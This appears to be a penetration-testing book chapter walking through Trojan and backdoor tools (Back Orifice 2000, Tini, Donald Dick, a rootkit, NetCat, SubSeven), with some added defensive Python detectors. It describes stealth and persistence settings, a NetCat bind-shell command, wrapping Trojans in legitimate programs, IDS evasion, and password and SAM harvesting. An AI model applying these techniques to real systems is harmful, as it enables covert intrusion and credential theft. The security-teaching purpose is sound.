Trojans and Backdoors


Now that you have a history and understanding of viruses and worms, it is time to progress to Trojan horse and backdoor applications. Although it is important to know about viruses and worms when discussing how to secure the network of an organization, they are not common tools employed by a penetration tester. Trojan horses, however, are often used as proof of concept tools to demonstrate gaining and maintaining access to compromised target systems.

This section covers the following Trojan horse and backdoor applications:

  • Back Orifice 2000

  • NetCat

  • Tini

  • Rootkit

  • Donald Dick

  • SubSeven

  • Brown Orifice

  • Beast

Back Orifice 2000

Back Orifice 2000 (BO2K) is a client-server remote administration tool (RAT) created by the Cult of the Dead Cow (www.cultofdeadcow.com). Founded in 1984, the Cult of the Dead Cow (cDc) is a hacktivist organization based out of Lubbock, Texas, whose goal is to promote security awareness.

Back Orifice 2000 was written by DilDog, a member of cDc. It is the successor to Back Orifice. BO2K supports the following features:

  • Keystroke logging

  • Registry editing

  • File transfers

  • Command shells

  • Process control

  • Remote shutdown and reboot

  • Password dumping

  • Screen capture

  • Mouse and keyboard control

  • Encrypted communication

BO2K is composed of three main files:

  • bo2k.exe

  • bo2kcfg.exe

  • bo2kgui.exe

The bo2k.exe file is the main Trojan executable. To remotely control your target system, you must first have this executable copied and loaded. One of the advantages of Back Orifice 2000 is the capability to delete the bo2k.exe file and hide it after it is running. This stealth capability means that a server administrator cannot see this program listed in Windows task manager.

The second file, bo2kcfg.exe, is the Back Orifice 2000 server configuration utility. This utility configures your Trojan server with such options as port number, encryption algorithm, and various stealth features.

Begin by launching the executable and choosing Open Server. Then choose the bo2k.exe server executable, as shown in Figure 12-1.

Figure 12-1. Back Orifice 2000 Server Configuration


Next, you need to install and configure the plug-ins. Plug-ins allow for new features to be added to Back Orifice 2000 without the need to release a new version. Figure 12-2 demonstrates installation of the authentication plug-in.

Figure 12-2. Installing the Authentication Plug-In


You can download plug-ins from http://www.bo2k.com. This website divides the available plug-ins into the following categories:

  • Encryption plug-ins

  • Authentication plug-ins

  • Server enhancement plug-ins

  • Client enhancement plug-ins

  • Communications plug-ins

  • Miscellaneous plug-ins

Encryption is advantageous because of its capability to mask what you are doing. A server administrator who has a packet sniffer cannot detect what you are doing on the target server. Also, encrypting your communication makes it more difficult to detect with an IDS device. Encryption options include AES, Serpent, CAST-256, and IDEA.

At press time, there is only one authentication plug-in, and it comes with the program. The authentication plug-in allows you to use a password with Back Orifice 2000.

Several server plug-ins are available. Most provide a means of notifying you after the Trojan is installed on a remote system. For example, the Rattler plug-in notifies you via e-mail of the IP address of the target system that is running the Trojan. This is helpful in environments that are running Dynamic Host Configuration Protocol (DHCP), where the IP address of systems change frequently. The SimpleRicq plug-in notifies you via the Internet Relay Chat (IRC) instead of e-mail, and the Rcgi plug-in notifies you on a web page via a CGI script.

At press time, only one client enhancement plug-in is available: BoTool. BoTool provides a graphical file browser and registry editor that makes common tasks easier by using a simplified user interface.

Communications plug-ins determine which transport layer protocol and port BO2K uses for its communication. Options include Transmission Control Protocol (TCP), User Datagram Protocol (UDP), and encrypted TCP. The encrypted TCP plug-in provides an encrypted flow control mechanism to make BO2K TCP traffic harder to detect. After adding the TCP or UDP communications plug-in, you need to configure the port number to communicate on. The port number must be set in two places.

Go to the startup option and choose the Init Cmd Bind Str setting. Type the value of the port number you want to use and click the Set Value button, as illustrated in Figure 12-3. You can choose whatever port number you want in this setting. In Figure 12-3, the port number 31337 is chosen, which is the port number that the original Back Orifice used.

Figure 12-3. BO2K Init Cmd Bind Str


The second place you need to set the port number is under the TCP or UDP options. (TCP is used in this example.) Select the Default Port setting, type the port number, and click the Set Value button, as shown in Figure 12-4.

Figure 12-4. BO2K TCP Settings


Finally, the miscellaneous plug-ins include BoPeep and LoveBeads. They are labeled Miscellaneous because they do not fall into any of the other categories. BoPeep is a popular plug-in because it allows you to see a streaming video of the machine's screen that the server is running on. It also allows you to control the victim's keyboard and mouse. LoveBeads allows you to chain several Back Orifice 2000-infected computers. With LoveBeads, you can connect to one infected computer and use it as a proxy to connect to other computers.

Some other options will probably be of interest to you that are not part of any plug-in but are part of the default installation of Back Orifice 2000. One of these is the Stealth option, the settings for which are shown in Figure 12-5.

Figure 12-5. BO2K Stealth Options


You might want to enable three settings to provide added stealth. Remember: As a penetration tester, you are concerned not only with what you are able to do to your target of evaluation, but also with what you are able to do without being detected. Therefore, stealth is always important in your testing.

The first of these options is the Run at startup option. Although this is not necessarily a Stealth setting, this option does execute the Trojan when Windows starts up. Without this option, you need to have some other mechanism of launching the bo2k.exe executable every time Windows starts up.

The second useful option is Delete original file. This provides added stealth by deleting the bo2k.exe file after you load the Trojan into memory.

The third useful option is Hide process. Without this option, Back Orifice 2000 shows up in the Windows Task Manager. This makes it easy to detect and, subsequently, easy to stop.

However, with the Hide process option selected, this Trojan does not show up, hiding it from unsuspecting administrators.

You can also choose Insidious mode. Insidious mode causes Back Orifice to rename itself so that Windows Explorer cannot see the file correctly. BO2K adds 254 spaces to the beginning of the filename so that Windows Explorer does not correctly display the filename.

After your options are configured, you should select Save Server to save your configuration. (See Figure 12-6.)

Figure 12-6. BO2K Save Configuration


Next, run the bo2k.exe executable on the target machine.

Now that the Trojan is running, you can connect to your target computer by using the Back Orifice 2000 client application. Figure 12-7 shows the client utility called bo2kgui.exe.

Figure 12-7. Bo2kgui.exe Back Orifice 2000 Client Utility


Before you can connect to your target computer, you must configure the appropriate plug-ins, as you did with the server configuration tool earlier. To do this, select the Plugins menu and choose Configure, as shown in Figure 12-8.

Figure 12-8. BO2K Client Plugins Option


Click the Insert button to insert the plug-ins. (See Figure 12-9.) With the exception of server enhancement plug-ins, you should include all the plug-ins that you selected earlier with the bo2kcfg.exe server configuration utility.

Figure 12-9. BO2k Client Plugins Installation


Next, you need to connect to your target machine. From the File menu, select New Computer, and enter a name, IP address, and port number of your target computer. Figure 12-10 uses TCP port 31337 (the same port you configured on the server earlier). Note that you enter the port number immediately after the IP address, in the format ip address:port number.

Figure 12-10. BO2K Server Settings


Double-click on the new server listed under Machines in the BO2K workspace window to bring up the window in Figure 12-11. Select the Connect button to connect to the target system.

Figure 12-11. BO Server Connection Window


When you are connected to the server, you can control the server using the options in the Server Commands window. By clicking on the Server Control option, as shown in Figure 12-12, you can remotely shut down and restart the server; load, debug, list, and remove plug-ins; and start, list, and stop command sockets.

Figure 12-12. BO Server Control Options


Under the Registry option, you see the options shown in Figure 12-13. With these options, you can add, delete, and rename keys and key values in the Windows registry.

Figure 12-13. BO Registry Control


If you want to see the files on your target system and download the file locally, go to File/Directory options, as shown in Figure 12-14. Here you can create new directories, delete files, and even upload files to the remote target machine, to name just a few options.

Figure 12-14. BO Server File/Directory Options


As an example, you can select List Directory, type a path such as C:\, and click the Send Command button. This produces a directory listing in the bottom pane, as shown in Figure 12-15.

Figure 12-15. BO Server List Directory Example


Back Orifice 2000 has many other options. You should experiment with the various options and plug-ins available to find those that will help you in your testing. Remember, however, the ultimate goal in penetration testing: to assess the security posture of a target network. Although options such as LoveBeads and BoPeep are helpful for malicious hackers, they are not as helpful for penetration testers. What you are attempting to do is show proof of concept on the vulnerability of a server. If the system is vulnerable and you are able to download, upload, and delete files, you have demonstrated that the target system is susceptible to Trojans. You have to assess whether you need to attempt every useable option in Back Orifice 2000.

Having so many options is certainly advantageous, but the drawback is in the amount of configuration that you need to do both with the client and server configuration utility. As an alternative, you might want to look at simpler remote access Trojans.

Tini

One simpler RAT tool is Tini. Tini is not only simpler to use than a tool like Back Orifice 2000, but it is also much smaller. Remember: As a penetration tester, you want to see how much you can do without being detected, and using a smaller Trojan makes it less likely to be detected. Tini, as its name implies, is a small RAT (only 3 KB in size). You can download Tini at http://ntsecurity.nu/toolbox/tini.

Having such a small size comes at a price, however. It is limited in functionality. After executing the Tini program on a target system, you can Telnet to the system on TCP port 7777. Using Telnet gives you a remote shell on your target system through which you can list directories or launch programs. This is limited in comparison to BO2K, but it is simpler to use and easier to get installed without being seen because of its small size.

Donald Dick

Donald Dick is a Trojan that is both simple to use and highly functional. With Donald Dick, you can do the following:

  • View processes

  • View the file system

  • Upload and download files

  • Execute programs

  • View the registry

  • Create new registry entries

  • View and kill processes

  • Retrieve screensaver and Complementary Metal Oxide Semiconductor (CMOS) passwords

  • View and change the system time

  • Get a screenshot of the target system

  • Open and close the CD-ROM tray

  • Turn the monitor on or off

  • Shut down or reboot the computer

  • Log off the current user

  • Send a message

  • Play a WAV file

Like most remote access Trojans, Donald Dick has both a client utility and a server utility. Copy the server utility onto your target system and run it. Next, run the client utility, shown in Figure 12-16.

Figure 12-16. Donald Dick Client Utility


Enter the IP address of your target system and then select the tab containing the function you want to attempt. For example, you can click on the File System tab and view the directory listing, as shown in Figure 12-17.

Figure 12-17. Donald Dick Directory Listing


By right-clicking in this window, you can upload, download, and delete files and directories. You can even execute programs remotely.

If you want to view the registry of your target system, click the Registry tab, as shown in Figure 12-18. Here, you can drill down into the registry settings. Figure 12-18 shows drilling down into the HKEY_LOCAL_MACHINE\SOFTWARE key.

Figure 12-18. Donald Dick Registry Tab


By right-clicking in this window, you can change, delete, or add a new registry value. (See Figure 12-19.) For example, you can add a new string value to the HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN key to make the Donald Dick server executable load on Windows startup.

Figure 12-19. Adding a Registry Value


By clicking on the Windows tab, you can view all the current windows that are running on the target system. For example, in Figure 12-20, you can see that two MS-DOS command prompts are open (C:\windows\system32\cmd.exe).

Figure 12-20. Donald Dick Windows Tab


As a penetration tester, it might not be that beneficial to know what windows are currently active on a server. What is helpful in a penetration test is being able to retrieve the passwords of your target system. You can do this by clicking Donald Dick's Passwords tab, as shown in Figure 12-21. You can get the screensaver password on Windows 95 and Windows 98 computers (and change it) and even get the CMOS password for common CMOS programs.

Figure 12-21. Donald Dick Passwords Tab


Clicking on the Miscellaneous tab (see Figure 12-22) offers numerous other options. Here you can cause the system to shut down or reboot, log off the current user, open or close the CD-ROM tray, and turn the monitor on or off. You can even capture a screenshot of the computer by clicking the ScreenShot button. (The screenshot is stored locally as shot$$$.bmp.)

Figure 12-22. Donald Dick Miscellaneous Tab


The Miscellaneous tab also offers the capability to send the target system a pop-up message. You can use this for social engineering purposes. For example, you can have a pop-up message asking the user to confirm information. (See Figure 12-23.)

Figure 12-23. Donald Dick Message Box


Finally, you can gain information about the location of Windows system files, the computer name, and the current logged on user by clicking Get Sysinfo from the System tab. (See Figure 12-24.) This is useful in enumerating user and system information in preparation for launching further attacks.

Figure 12-24. Donald Dick System Tab


Donald Dick is a feature-rich client-server Trojan application. It does not have a way of hiding itself, however. It shows up in Task Manager as pmss.exe on Windows NT/2000/2003 systems.

Rootkit

One way to hide files on your target system is to use the NT/2000 Rootkit. This is a kernel mode driver that allows you to hide processes, files, and registry entries. Rootkit has two main files:

  • _root_.sys

  • deploy.exe

You need to copy both of these files to the target system. After you have copied them, execute the deploy.exe executable, which loads _root_.sys into memory. When this is loaded, you can delete the deploy.exe program.

Rootkit hides all files that begin with _root_ when the rootkit is started. To run the rootkit, type net start _root_. To stop the rootkit, type net stop _root_.

For example, if you want to hide a Trojan utility called server.exe, you can rename it to _root_server.exe. After you type net start _root_, the Trojan executable is hidden from view. Directory listings do not show the program.

Rootkit is an excellent way to hide programs such as Trojans on your target machine.
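Both hiding tricks described in this chapter leave a trace in the filename itself: BO2K's Insidious mode prepends 254 spaces, and the NT/2000 Rootkit only hides names that start with _root_ while its driver is loaded. The following Python script is an added defensive example and is not part of the chapter or of either tool. It walks a directory tree and reports names that carry either indicator or that match a short list of Trojan filenames taken from this chapter (the KNOWN_TROJAN_NAMES list and the sample files in demo() are constructed for illustration).

```python
import os
import tempfile

# Number of spaces BO2K Insidious mode prepends to its own filename (from the chapter).
INSIDIOUS_PAD = 254
# Prefix the NT/2000 Rootkit hides from directory listings while _root_.sys is running.
ROOTKIT_PREFIX = "_root_"
# Filenames this chapter associates with Trojan servers; illustrative, not exhaustive.
KNOWN_TROJAN_NAMES = {"bo2k.exe", "pmss.exe", "nc.exe", "server.exe"}


def name_indicators(name):
    """Return a list of reasons a file or directory name looks like a hidden Trojan.

    An empty list means the name shows none of the indicators checked here.
    """
    reasons = []
    pad = len(name) - len(name.lstrip(" "))
    if pad:
        note = " (matches BO2K Insidious mode)" if pad == INSIDIOUS_PAD else ""
        reasons.append(f"{pad} leading space(s){note}")
    stripped = name.strip(" ").lower()
    if stripped.startswith(ROOTKIT_PREFIX):
        reasons.append("_root_ prefix (hidden while the NT/2000 Rootkit driver is loaded)")
    if stripped in KNOWN_TROJAN_NAMES:
        reasons.append(f"known Trojan filename {stripped}")
    return reasons


def scan_tree(root):
    """Walk `root` and return [(full_path, reasons), ...] for every flagged entry."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            reasons = name_indicators(name)
            if reasons:
                hits.append((os.path.join(dirpath, name), reasons))
    return hits


def demo():
    """Build a constructed sample tree, scan it, and return the hits sorted by name."""
    with tempfile.TemporaryDirectory() as root:
        # Constructed sample: one clean file and three that should be flagged.
        for name in ("readme.txt", "_root_server.exe", "   update.exe", "pmss.exe"):
            open(os.path.join(root, name), "w").close()
        return sorted((os.path.basename(p), r) for p, r in scan_tree(root))


if __name__ == "__main__":
    for name, reasons in demo():
        print(repr(name), "->", "; ".join(reasons))
```

Because the rootkit filters directory listings on the running system, scan_tree() only finds _root_ entries when it runs against a disk that was mounted from clean media or examined offline; on the infected host itself the leading-space and known-name checks still work, since those tricks fool the eye rather than the file system.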

Note

Another utility that works similarly to the NT/2000 Rootkit is Fu (http://www.rootkit.com). Instead of deploy.exe and _root_.sys, it uses fu.exe and msdirectx.sys.


NetCat

NetCat is known as the Swiss-army knife of hacking. You can use it to gain access to a remote shell (like other remote access Trojans), scan ports, perform banner grabbing for reconnaissance purposes, and transfer files.

For the purposes of this chapter, this section covers using NetCat to shovel a remote shell and transfer files.

To shovel a remote shell, copy the NetCat nc.exe executable to the target machine and run the following command:

c:\nc -l -p 1111 -e cmd.exe -d

Several switches are used in this example:

  • -l: This switch tells NetCat to begin listening for connections. This switch is used only on the target system.

  • -p 1111: This switch tells NetCat to begin listening on port 1111. You can specify any port you want.

  • -e cmd.exe: This switch tells NetCat to execute the command cmd.exe (command shell). You can instruct NetCat to execute any command you want.

  • -d: This switch tells NetCat to run in daemon mode.

Next, you need to start NetCat on your computer. Assuming your target is 192.168.1.29 and your port number is 1111, execute the following command:

c:\nc 192.168.1.29 1111

Look at Figures 12-25 and 12-26 for an example of using NetCat to shovel a remote shell. In this example, you connect to a remote computer on port 1111 and create a directory called hacked.

Figure 12-25. NetCat Target


Figure 12-26. NetCat Client


Of course, many environments deploy firewalls that limit what ports you can use. However, some ports are commonly allowed in. TCP port 80 (HTTP/web), TCP port 53 (DNS zone transfers), and TCP port 25 (SMTP) are commonly allowed inbound. Even if the server is running a service like a web server, DNS server, or e-mail server, you can still use NetCat to connect into that port. If you use port 80, for example, the first NetCat connection gives you a remote shell, but all subsequent connections connect you to the web server.

The second Trojan use of NetCat is to upload and download files from a remote system. For this example, NetCat is used to upload a file called secret.txt to the target server. First, load NetCat in listener mode on port 1111. Specify that you are waiting to receive a file called secret.txt. (See Figure 12-27.)

Figure 12-27. NetCat Target


Next, send the file secret.txt to the server. (See Figure 12-28.)

Figure 12-28. NetCat Client


To verify that NetCat indeed copied the file, reconnect into the target server and view the file using the type command. (See Figure 12-29.) The file contains the text "You've been hacked by NetCat!"

Figure 12-29. NetCat Verification


Because NetCat is executed from the command line, it can be tied into a scripted attack. It is also small (about 60 KB), making it easy to upload and run without being detected. NetCat has many features and is definitely a tool you should have in your penetration testing "toolbelt."
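From the defender's side, a shovelled shell or a RAT server shows up as a listening socket owned by a process that has no business accepting connections. The following Python script is an added example, not part of the chapter or of NetCat: it parses the text of a Windows netstat -ano listing together with a PID-to-image map (as tasklist would provide) and reports listeners that are bound to a port this chapter associates with a Trojan (31337, 7777, 1111) or owned by an image such as nc.exe or cmd.exe. The netstat lines and PID map are constructed samples, and the two watch lists are illustrative assumptions.

```python
# Ports this chapter associates with Trojan listeners (illustrative, easily changed).
RAT_PORTS = {31337: "Back Orifice default", 7777: "Tini", 1111: "NetCat example"}

# Images that should not own a LISTENING socket on a workstation (assumption).
LISTENER_IMAGE_WATCHLIST = {"nc.exe", "cmd.exe", "bo2k.exe", "pmss.exe"}

# Constructed sample of `netstat -ano` output; not captured from a real host.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       876
  TCP    0.0.0.0:1111           0.0.0.0:0              LISTENING       2440
  TCP    0.0.0.0:7777           0.0.0.0:0              LISTENING       3020
  TCP    192.168.1.29:1111      192.168.1.10:49172     ESTABLISHED     2440
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:31337          *:*                                    3120
  UDP    0.0.0.0:123            *:*                                    1104
"""

# Constructed PID -> image map, as `tasklist` would give it.
SAMPLE_PIDS = {876: "svchost.exe", 2440: "nc.exe", 3020: "update.exe",
               4: "System", 3120: "bo2k.exe", 1104: "svchost.exe"}


def parse_netstat(text):
    """Return [(proto, local_ip, local_port, state, pid), ...] from `netstat -ano` text.

    TCP rows carry a State column; UDP rows do not, so the PID index differs.
    """
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue  # blank lines, banner and column header
        proto, local = parts[0], parts[1]
        if proto == "TCP":
            state, pid = parts[3], parts[4]
        else:
            state, pid = "", parts[3]
        ip, _, port = local.rpartition(":")  # rpartition keeps IPv6 "[::]" intact
        rows.append((proto, ip, int(port), state, int(pid)))
    return rows


def find_suspicious_listeners(netstat_text, pid_to_image):
    """Return a list of findings for listening sockets matching either watch list."""
    findings = []
    for proto, ip, port, state, pid in parse_netstat(netstat_text):
        listening = proto == "UDP" or state == "LISTENING"
        if not listening:
            continue
        image = pid_to_image.get(pid, "<unknown>").lower()
        reasons = []
        if port in RAT_PORTS:
            reasons.append(f"port {port} ({RAT_PORTS[port]})")
        if image in LISTENER_IMAGE_WATCHLIST:
            reasons.append(f"listener owned by {image}")
        if reasons:
            findings.append({"proto": proto, "ip": ip, "port": port,
                             "pid": pid, "image": image, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_listeners(SAMPLE_NETSTAT, SAMPLE_PIDS):
        print(f"{f['proto']} {f['ip']}:{f['port']} pid={f['pid']} {f['image']}: "
              + "; ".join(f["reasons"]))
```

The port list is the weaker of the two checks, since the chapter itself points out that any port, including 80, can be chosen; the image check is what catches a cmd.exe or nc.exe that is accepting connections regardless of port, and it is the one worth keeping current.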

Tip

For added stealth, you might want to use Cryptcat. Cryptcat, developed by Farm9, takes the original NetCat for Windows and adds Twofish encryption. Encrypting your NetCat communication makes it less likely for packet sniffers and IDS to detect it.


SubSeven

SubSeven is a powerful Trojan created by FuX0red that is available at http://www.sub7.net. Four files are included in the SubSeven package:

  • Subseven.exe This is the client application you can use to remotely control your target system.

  • Server.exe This is the server executable you need to copy and execute on your target host.

  • Editserver.exe This is the file you use to configure server.exe.

  • Icgmapi.dll This DLL is necessary only if you want to use the ICQ features of SubSeven.

SubSeven has similarities to Back Orifice 2000 in that it has a client, server, and server configuration utility. You should begin by opening the server configuration utility (Editserver.exe), as shown in Figure 12-30.

Figure 12-30. SubSeven Editserver.exe


Click the browse button and select the server (server.exe). Then select the read current settings button to import the current server.exe configuration. Usually the default settings are acceptable, but you might want to change a few. You can break down the server settings into the categories shown in Table 12-1.

Table 12-1. SubSeven Server Settings

  • Startup method(s): Use this to control how SubSeven starts. Popular options include adding it to the RunService or Run key in the Windows registry. The key name represents how it is to appear in the registry.

  • Notification options: These options detail how you want to be notified of an infected host. You can choose to be notified via e-mail, ICQ, or IRC.

  • Protect server: You can add a password so that others cannot edit it using the Server edit utility. Note that this is different from the password in the installation options.

  • Installation: Here you can choose what port you want SubSeven to use. (The default is 27374.) You can also set a password so that you can only connect with the correct password. (This is different from the password in the protect server options.) You can also enable a fake error message to appear when the Trojan is executed on the server to lead unsuspecting users away from thinking a Trojan is being installed.


The installation section has an option to bind the Trojan to another executable (bind server with EXE file ?). Binding, or wrapping, a Trojan into another executable is a way to hide the file from unsuspecting users. You can wrap the Trojan around a legitimate executable such as Notepad.exe, and when the user launches the program, the Trojan is installed.

Tip

The author of the Trojan, FuX0red, recommends that you use another program to bind it. Some tools to wrap your Trojan into another .exe file include OblivionJoiner (http://www.oblivionrat.com), and Exebinder (http://www.elitec0ders.net).


After you have configured the server to your liking, press the save new settings button.

Next, copy the executable to your target host and launch it. Use the SubSeven client application to connect to the remote host. (See Figure 12-31.)

Figure 12-31. SubSeven Client Utility


The SubSeven Trojan has many functions that you can run against your infected target. These functions are broken down into the categories shown in Table 12-2.

Table 12-2. SubSeven Features

  • Connection: IP Scanner, Get PC Info, Get Home Info, Server Options, IP Notify

  • Keys/messages: Keyboard, Chat, Matrix, Msg Manager, Spy, ICQ Takeover

  • Advanced: Ftp/Http, Find Files, Passwords, Reg Edit, App Redirect, Port Redirect

  • Miscellaneous: File Manager, Window Manager, Process Manager, Text-2-speech, Clipboard Manager, IRC Bot

  • Fun manager: Desktop/Webcam, Flip Screen, Print, Browser, Resolution, Win Colors

  • Extra fun: Screen Saver, Restart Win, Mouse, Sound, Time/Date, Extra

  • Local options: Quality, Local Folder, Skins, Misc Options, Advanced, Run EditServer


Although numerous options are available with SubSeven, this section highlights some of the more interesting ones, such as the following:

  • IP Scanner

  • Get PC Info

  • Keyboard Logging

  • Chat

  • Matrix Screensaver

  • Msg Manager

  • Find Files

  • Passwords

  • Reg Edit

  • File Manager

  • Window Manager

  • Process Manager

  • Clipboard Manager

  • Desktop/Webcam

  • Flip Screen

  • Browser

  • Restart Win

  • Mouse

  • Extra Features

The IP scanner, shown in Figure 12-32, scans a subnet range for hosts that have been infected with the SubSeven Trojan. To prevent raising IDS alarms, you can change the delay time. (The default is four seconds.)

Figure 12-32. SubSeven IP Scanner


As shown in Figure 12-33, the get pc info option is under the connection tab. By clicking the retrieve button, you can pull information about the computer name, username, OS version, location of system files, and more. This is helpful when performing reconnaissance on your target system.

Figure 12-33. SubSeven Get PC Info


You can find the keyboard option, shown in Figure 12-34, under the keys/message tab. This option runs a remote keylogger on your target host. You can log all keys typed by users, send keys yourself, and even disable the keyboard.

Figure 12-34. SubSeven Keyboard Option


When you choose to send keys to the remote target host, you can also choose which active program to send the text to. (See Figure 12-35.) The program must be actively running on the target and be able to accept text input. Word processors are the best option for sending keys. In Figure 12-35, the message "You've been hacked!" is sent to the Notepad application on the target host. (See Figure 12-36.)

Figure 12-35. SubSeven Send Keys Option


Figure 12-36. SubSeven Send Keys Result


The chat option shown in Figure 12-37 allows you to launch a chat window with the logged in user on the target system. You can imagine the surprise of an unsuspecting user when a window pops up asking to chat with him. You can choose the size of the popup chat window, the colors, and the font sizes. You can even choose to chat with other SubSeven clients.

Figure 12-37. SubSeven Chat Options


SubSeven even has the capability to activate a Matrix screensaver on the remote machine. (See Figure 12-38.) This is a malicious hacker's way of showing that he has "owned" the box. You can type text to be displayed when the screensaver is activated, such as "you've been hacked."

Figure 12-38. SubSeven Matrix Feature


The msg manager feature shown in Figure 12-39 allows you to send a message to the remote infected host. The response from the user is sent back to you. You can use this as a social engineering tool to ask for information such as passwords from unsuspecting users.

Figure 12-39. SubSeven Msg Manager Feature


Also under the advanced tab is the find files feature (see Figure 12-40), which allows you to search the hard drive of the remote host for files. This assists you in searching for important files that might be of value to the administrators of the target machine. For example, you can use this to search for the SAM file, which contains a list of all accounts and hashed passwords. SubSeven even saves a list of files it finds so that you can review the list later. Click show previously found files to see this cached list. (Because the SAM is unavailable while it is in use, you should look for the copy of the SAM file in the Repair directory.)

Figure 12-40. SubSeven Find Files Feature


As a penetration tester, you should be actively looking for ways to gather passwords from your target system. SubSeven can assist you with this using its passwords feature under the advanced tab. (See Figure 12-41.) Here you can get any cached passwords that are currently stored in RAM, recorded passwords, RAS, ICQ, and AOL Instant Messenger passwords.

Figure 12-41. SubSeven Password Retrieval Feature


The reg edit feature, also under the advanced tab, allows you to remotely edit the registry of your target system. This is helpful in several ways. You can use this to get the SIDs and number of users from the HKEY_USERS hive key, see what software is installed on the system by examining the HKEY_LOCAL_MACHINE\SOFTWARE key, or add a key to have Windows start a program upon startup in the HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN key. Figure 12-42 demonstrates drilling down into specific keys. Note that SubSeven allows you not only to view the remote registry, but also to change, delete, or add new keys and values.

Figure 12-42. SubSeven Reg Edit Feature
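Donald Dick, SubSeven's startup options, and the reg edit feature above all rely on the same persistence point: a value under the Run or RunServices key of HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion. The following Python script is an added defensive example, not part of the chapter or of either tool. It parses the text of a .reg export of those keys (as produced by reg export or Regedit's Export command), lists every autostart entry, and flags those whose image is a Trojan filename named in this chapter or lives in a temp or user-profile directory. The export text, the WATCH_IMAGES set and the WATCH_DIRS tuple are constructed assumptions for illustration.

```python
import re

# Autostart keys this chapter names (compared case-insensitively against the key path tail).
AUTOSTART_KEYS = ("\\microsoft\\windows\\currentversion\\run",
                  "\\microsoft\\windows\\currentversion\\runservices")
# Filenames this chapter associates with Trojan servers (illustrative).
WATCH_IMAGES = {"server.exe", "pmss.exe", "bo2k.exe", "nc.exe"}
# Directories a legitimate autostart entry rarely runs from (assumption).
WATCH_DIRS = ("\\temp\\", "\\tmp\\", "\\users\\", "\\documents and settings\\")

# Constructed .reg export; the SoundMAX line is a benign entry with an embedded quoted path.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMAX"="\"C:\\Program Files\\Analog Devices\\SoundMAX\\SMax4.exe\" /tray"
"WinUpdate"="C:\\WINDOWS\\Temp\\server.exe"
"pmss"="C:\\WINDOWS\\system32\\pmss.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"SysTray"="C:\\WINDOWS\\system32\\systray.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Foo]
"DisplayName"="Foo"
'''

# "name"="data" lines; .reg files escape backslash and double quote with a backslash.
_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def _unescape(s):
    """Undo .reg escaping: \\ -> \ and \" -> " (any backslash-escaped char)."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Return {key_path: {value_name: string_data}}; only REG_SZ values are parsed."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None:
            m = _VALUE_RE.match(line)
            if m:
                keys[current][_unescape(m.group(1))] = _unescape(m.group(2))
    return keys


def autostart_entries(text):
    """Return [(key, value_name, command), ...] for values under Run/RunServices keys."""
    out = []
    for key, values in parse_reg_export(text).items():
        if key.lower().endswith(AUTOSTART_KEYS):
            out.extend((key, name, cmd) for name, cmd in values.items())
    return out


def image_of(command):
    """Extract the executable path from a command line (quoted path, or first token)."""
    cmd = command.strip()
    if cmd.startswith('"'):
        return cmd[1:cmd.find('"', 1)]
    return cmd.split(" ")[0]  # unquoted paths containing spaces are truncated here


def flag_autostart(text):
    """Return findings for autostart entries matching the image or directory watch lists."""
    findings = []
    for key, name, cmd in autostart_entries(text):
        low = image_of(cmd).lower()
        base = low.rsplit("\\", 1)[-1]
        reasons = []
        if base in WATCH_IMAGES:
            reasons.append(f"image name {base}")
        if any(d in low for d in WATCH_DIRS):
            reasons.append("runs from a temp or user-profile directory")
        if reasons:
            findings.append({"key": key, "name": name, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in flag_autostart(SAMPLE_REG):
        print(f"{f['name']} = {f['command']}: " + "; ".join(f["reasons"]))
```

Listing every autostart entry, not just the flagged ones, is the more useful habit: the chapter notes that SubSeven lets the operator choose the value name, so an unfamiliar name pointing at an unfamiliar path deserves a look even when neither watch list matches it.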


You can find the file manager feature under the miscellaneous tab. (See Figure 12-43.) The file manager is filled with numerous features, including the capability to do the following:

  • Upload and download files

  • Delete files

  • Print files

  • Edit files

  • Get the size of files

  • Play WAV files

  • View .jpg images

  • Execute files

  • Change the desktop wallpaper

Figure 12-43. SubSeven File Manager


The windows manager (see Figure 12-44) allows you to see all the active windows running on the remote host. You can even close programs running on the remote host, causing a DoS attack. Be sure to click show all applications to see all applications that are running on your target.

Figure 12-44. SubSeven Windows Manager Feature


Somewhat related to the windows manager is the process manager, shown in Figure 12-45. Here you can see the underlying processes that applications are using. You can even change the priority of a process to give it more or fewer resources than other processes. Available priorities include Realtime, High, AboveNormal, Normal, BelowNormal, and Low. If you want to perform a DoS attack and stop processes, you can click on the process you want to stop and click the kill app button.

Figure 12-45. SubSeven Process Manager Feature


Users often copy and paste text using the Windows clipboard feature so that they do not have to retype the same text again. Using the SubSeven clipboard manager found under the miscellaneous tab (see Figure 12-46), you can view what is currently in the clipboard. Of course, this requires that information be in the clipboard. You can also use the clipboard manager to change what is currently in the clipboard. A user might copy text that says, "This is important information that should be secure." Then, using the SubSeven Clipboard Manager, you can change this to read, "You've been hacked!" When the user pastes the text into his word processor, he does not see the text he copied but instead sees what you placed in the clipboard: the message, "You've been hacked!"

Figure 12-46. SubSeven Clipboard Manager


